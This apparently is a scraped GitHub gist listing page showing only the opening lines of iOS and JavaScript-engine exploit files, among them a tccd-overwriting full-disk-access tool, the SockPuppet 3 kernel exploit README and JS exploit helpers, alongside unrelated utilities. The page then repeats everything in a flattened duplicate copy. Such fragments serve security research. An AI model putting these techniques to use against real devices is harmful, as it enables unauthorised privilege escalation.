github410117

## grant_full_disk_access.m
@import Darwin;
@import Foundation;
@import MachO;

#import <mach-o/fixup-chains.h>
// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
// WDBFontOverwrite
// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
// Please don't call this code on iOS 14 or below
// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)

## iOS_16_Launch_Constraints.txt
iOS 16 introduced launch constraints, which can be used to constraint the launch of an application.
There are three types of constraints:
    Self Constraints, which the launched application itself must meet
    Parent Constraints, which the parent process must meet
    Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service)

Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints.
Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch and they can be included in the code signature, in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements).

Constraint Categories (from TrustCache, new in version 2):

## fuck.js
function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));

## patchfinder64.c
//
//  patchfinder64.c
//  extra_recipe
//
//  Created by xerub on 06/06/2017.
//  Copyright © 2017 xerub. All rights reserved.
//

#include <assert.h>
#include <stdint.h>

## 3_years_of_attacking_javascript_engines.txt
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|

The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a

## README.md

      
              4 files
            
          
              10 forks
            
          
              0 comments
            
          
              38 stars
            
          
                ur0
                / README.md
            
            
              Last active
              June 13, 2024 00:24
            
              
                SockPuppet 3
              
          
    SockPuppet 3

This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port
corresponding to the kernel task and gets a send right to it.
This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely
reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations
can be prevented -- this might improve reliability even more.
License


## qwertybug.html
<pre id="logs"></pre>

<script>
// utilities

let arr = new Uint32Array(2);
let arr64 = new Float64Array(arr.buffer); // use same buffer

function floatToInt(float) {
	arr64[0] = float;

## xxtea.py
import struct

_DELTA = 0x9E3779B9

def _long2str(v, w):
    n = (len(v) - 1) << 2
    if w:
        m = v[-1]
        if (m < n - 3) or (m > n): return ''
        n = m

## runCommand.swift
import Foundation

func withCStrings(_ strings: [String], scoped: ([UnsafeMutablePointer<CChar>?]) throws -> Void) rethrows {
    let cStrings = strings.map { strdup($0) }
    try scoped(cStrings + [nil])
    cStrings.forEach { free($0) }
}

enum RunCommandError: Error {
    case WaitPIDError

## redis_cheatsheet.bash
# Redis Cheatsheet
# All the commands you need to know


redis-server /path/redis.conf  # start redis with the related configuration file
redis-cli                      # opens a redis prompt


# Strings.
	@import Darwin;
	@import Foundation;
	@import MachO;

	#import <mach-o/fixup-chains.h>
	// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
	// WDBFontOverwrite
	// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
	// Please don't call this code on iOS 14 or below
	// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)
	iOS 16 introduced launch constraints, which can be used to constraint the launch of an application.
	There are three types of constraints:
	Self Constraints, which the launched application itself must meet
	Parent Constraints, which the parent process must meet
	Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service)

	Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints.
	Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch and they can be included in the code signature, in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements).

	Constraint Categories (from TrustCache, new in version 2):
	function sleep( sleepDuration ){
	var now = new Date().getTime();
	while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
	}
	function gc() {
	for (let i = 0; i < 0x10; i++) {
	new ArrayBuffer(0x1000000);
	}
	}
	let data_view = new DataView(new ArrayBuffer(8));
	//
	// patchfinder64.c
	// extra_recipe
	//
	// Created by xerub on 06/06/2017.
	// Copyright © 2017 xerub. All rights reserved.
	//

	#include <assert.h>
	#include <stdint.h>
	\|=-----------------------------------------------------------------------=\|
	\|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=\|
	\|=-----------------------------------------------------------------------=\|
	\|=------------------------------=[ saelo ]=------------------------------=\|
	\|=-----------------------------------------------------------------------=\|

	The following are some brief notes about the changes that have taken place
	since the release of the "Attacking JavaScript Engines" paper [1]. In
	general, no big conceptional changes have happened since. Mitigations have
	been added to break some of the presented techniques and, as expected, a
	<pre id="logs"></pre>

	<script>
	// utilities

	let arr = new Uint32Array(2);
	let arr64 = new Float64Array(arr.buffer); // use same buffer

	function floatToInt(float) {
	arr64[0] = float;
	import struct

	_DELTA = 0x9E3779B9

	def _long2str(v, w):
	n = (len(v) - 1) << 2
	if w:
	m = v[-1]
	if (m < n - 3) or (m > n): return ''
	n = m
	import Foundation

	func withCStrings(_ strings: [String], scoped: ([UnsafeMutablePointer<CChar>?]) throws -> Void) rethrows {
	let cStrings = strings.map { strdup($0) }
	try scoped(cStrings + [nil])
	cStrings.forEach { free($0) }
	}

	enum RunCommandError: Error {
	case WaitPIDError
	# Redis Cheatsheet
	# All the commands you need to know


	redis-server /path/redis.conf # start redis with the related configuration file
	redis-cli # opens a redis prompt


	# Strings.